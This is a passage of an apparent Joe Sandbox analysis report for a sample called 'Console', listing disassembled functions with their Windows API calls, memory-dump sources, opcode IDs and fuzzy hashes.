                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ContextTokenUninitialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3685926914-0
                                                                                                                                                                                                                          • Opcode ID: 7f6a14618ff4eab59afb1096b00e6f4e18bead183be823f0743c7281082133f6
                                                                                                                                                                                                                          • Instruction ID: f6f7cb5c5e9419f25a7742837833478d53c3c4da9fb938232e9d4bc5238d5ff2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f6a14618ff4eab59afb1096b00e6f4e18bead183be823f0743c7281082133f6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2541CB31A04706CBEB25AF6CD9487AABBE0EB00715F1041AEE8E597792D736E405CB90
                                                                                                                                                                                                                          Function 010891A0 Relevance: 3.1, APIs: 2, Instructions: 113threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 010891C8
                                                                                                                                                                                                                          • CoRegisterInitializeSpy.OLE32(00000000,?), ref: 01089275
                                                                                                                                                                                                                            • Part of subcall function 010893A0: CoUninitialize.OLE32(7CAB6A82,?,?,?,?,?,?,?,00000000,014C8A45,000000FF,?,010891FA), ref: 0108940A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentInitializeRegisterThreadUninitialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2553331981-0
                                                                                                                                                                                                                          • Opcode ID: 5bb802ed3c780fa3849c89d879efbf73e609e3bde6eda52933b84f3ddeed460b
                                                                                                                                                                                                                          • Instruction ID: 2bad6594df2e3149f6a379110887c40094280a1025241036e22d56a5fc5d92bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bb802ed3c780fa3849c89d879efbf73e609e3bde6eda52933b84f3ddeed460b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E241E3B09057499BDB15DF68C800BAABBF4FB45714F2043AEE855E73C0D7769A00CB80
                                                                                                                                                                                                                          Function 014181D0 Relevance: 3.1, APIs: 2, Instructions: 82threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 01418265
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2882836952-0
                                                                                                                                                                                                                          • Opcode ID: aea304235f1ba1ab7c2168cf2d43a633e261da61e87142de8317a46137722760
                                                                                                                                                                                                                          • Instruction ID: 9d11f2a1ade8fae8c64589a86b22e93ff4aec2916538d289c036a6feaae246aa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aea304235f1ba1ab7c2168cf2d43a633e261da61e87142de8317a46137722760
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93318F74A00609DFDB20DFA8EC4936ABFF4FB05314F104A6EE81597394D7799520CB90
                                                                                                                                                                                                                          Function 012D6670 Relevance: 3.1, APIs: 2, Instructions: 71threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,012D71E0,00000000,00000000,00000000), ref: 012D6703
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 012D671A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3032276028-0
                                                                                                                                                                                                                          • Opcode ID: aeb912f3434ce92c8c2ff92ea29ef576e3ade6d2febc927799e1e69fb1171b22
                                                                                                                                                                                                                          • Instruction ID: 3b6cabd99fb0c86376b44dfa774771c91faa73e59819c6671ab73b8fb8893f8f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aeb912f3434ce92c8c2ff92ea29ef576e3ade6d2febc927799e1e69fb1171b22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B23159B4A04249EFEB14CF99C855BAEBFB4FB05714F10816EE500A7380D7B56505CB90
                                                                                                                                                                                                                          Function 01215CA0 Relevance: 3.0, APIs: 2, Instructions: 50memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                          • Opcode ID: 18f8da7196a101010b672ce19763a183de900f5922fe2f2b94ab799d3bb0d087
                                                                                                                                                                                                                          • Instruction ID: c091be7e1b88f7281abd3e92c0539d3937ae66ed53ad6194362c393a069724c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18f8da7196a101010b672ce19763a183de900f5922fe2f2b94ab799d3bb0d087
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9601D43472030ABFDB11EBBEED04B9777EDEBA6911F104069F609C7214EA709840C790
                                                                                                                                                                                                                          Function 01215D50 Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                          • Opcode ID: 00cccfebc87c977b1938ebd9f6a3f96715fb790e656dd54d650b268c6ef01c37
                                                                                                                                                                                                                          • Instruction ID: 5987490427a56754f4de984419fb862e39e3e171261b44d1dc499e87a47c81d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00cccfebc87c977b1938ebd9f6a3f96715fb790e656dd54d650b268c6ef01c37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44012172B54691EFD732CF68DD04B96B7E8FB0AA20F4042AEE806C7354DB319800CB90
                                                                                                                                                                                                                          Function 01215D00 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                          • Opcode ID: cb1dad278327db0c1d8f436cc6ca95aac5895ffcd5c68a42261977809aa89b0a
                                                                                                                                                                                                                          • Instruction ID: c27eaea253d8514ac6e53721c21e230e85941cbea0904525b578836858be7304
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb1dad278327db0c1d8f436cc6ca95aac5895ffcd5c68a42261977809aa89b0a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF09B74720252DFE726DB79DD0CB5737D8BB5A751F8444A8E609C7718DA248841C750
                                                                                                                                                                                                                          Function 01091960 Relevance: 2.9, APIs: 2, Instructions: 434memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 01091E7C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 6faa9fcf6efcbcec86822c9b4b306aaf2547f16d370efd08d072de8563fb8f76
                                                                                                                                                                                                                          • Instruction ID: 587faa7800b3ae9e70da9fd5316758fe8dfa5c78f143bb4d2408d90d11a44adb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6faa9fcf6efcbcec86822c9b4b306aaf2547f16d370efd08d072de8563fb8f76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF1C330B0030A9FEF65CF58C8A5BAEBBF1FF45360F154098E985AB291D774A841DB50
                                                                                                                                                                                                                          Function 01090AB0 Relevance: 2.9, APIs: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,?,00000000), ref: 01090C16
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01090EFF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: d943e962dcfe9157a475cd81603d2b2a1aa2937ec3e5fab4113d58d0e27f6c4b
                                                                                                                                                                                                                          • Instruction ID: e0ad87da8ceaccc07a59b0298bc10f48475ef9192d12e27dd6ad2e9e1b715a13
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d943e962dcfe9157a475cd81603d2b2a1aa2937ec3e5fab4113d58d0e27f6c4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F1AF70E002199FDF24CFA8C860BADBBF9EF44314F148199E959AB395DB35A942DF40
                                                                                                                                                                                                                          Function 00FD8E80 Relevance: 2.8, APIs: 2, Instructions: 311memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0163EA90,?,?,?,7CAB6A82,00000000,?,00000000), ref: 00FD8FEC
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FD9043
                                                                                                                                                                                                                            • Part of subcall function 0115DFB0: SetEvent.KERNEL32(03C16350,03C16300,00000001,0115DCA4), ref: 0115E020
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEventFreeHeapLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3469919578-0
                                                                                                                                                                                                                          • Opcode ID: 9c540064c1b2c9676742a4c3b5f049ed89b04bf717433e813707d0247d3345a4
                                                                                                                                                                                                                          • Instruction ID: 84930a41cd98ec56f17d22051971f4700ddcf379e71af04d2e4f5007735a73cb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c540064c1b2c9676742a4c3b5f049ed89b04bf717433e813707d0247d3345a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C11171904309EFDB20CFA8D884BAEBBF6FB45354F08845AEC489B351CB75A805DB91
                                                                                                                                                                                                                          Function 010618C0 Relevance: 2.7, APIs: 2, Instructions: 239memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 010619A8
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000010), ref: 010619C5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                          • Opcode ID: b886b37c87e3264f18db8b6415dd7d331e5e8e537bf00ffba5e67c9eb2c9aad5
                                                                                                                                                                                                                          • Instruction ID: 0844ee840649c73f466f1b8feb6737e73c4c517629e39023c6278ce028e37f9c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b886b37c87e3264f18db8b6415dd7d331e5e8e537bf00ffba5e67c9eb2c9aad5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37A1C1B0A00745DFEB61CF69C4447AEBBF8FB44718F1086ADD8959B781D7B9A904CB80
                                                                                                                                                                                                                          Function 01086670 Relevance: 2.7, APIs: 2, Instructions: 182memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0108673E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01086791
                                                                                                                                                                                                                            • Part of subcall function 0115DFB0: SetEvent.KERNEL32(03C16350,03C16300,00000001,0115DCA4), ref: 0115E020
                                                                                                                                                                                                                            • Part of subcall function 0115D9F0: LeaveCriticalSection.KERNEL32(03BFE840,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,80131506), ref: 0115DA39
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
